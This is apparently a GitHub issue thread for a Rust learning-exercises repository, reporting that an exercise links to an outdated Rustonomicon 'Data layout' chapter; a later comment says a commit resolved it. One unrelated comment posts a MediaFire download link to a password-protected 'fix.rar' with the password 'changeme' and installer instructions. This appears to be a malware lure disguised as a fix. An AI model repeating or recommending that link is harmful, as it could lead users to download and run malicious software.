### ISSUE TITLE
(03) ticket_v1 - (09) heap outdated reference

### ISSUE THREAD

**Issue by lundybernard** [mainmatter/100-exercises-to-learn-rust#137]
Exercise (03) ticket_v1 - (09) heap references [the "Data layout" section of the Rustonomicon](https://doc.rust-lang.org/nomicon/data.html)

The Data layout section currently reads:
"This chapter is ideally in agreement with, and rendered redundant by, the [Type Layout section of the Reference](https://doc.rust-lang.org/reference/type-layout.html). When this book was first written, the reference was in complete disrepair, and the Rustonomicon was attempting to serve as a partial replacement for the reference. This is no longer the case, so this whole chapter can ideally be deleted."

The link may need to be updated now or in the near future.

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by cenviity** [comment]
Looks like this has been resolved by f4cb4b5.
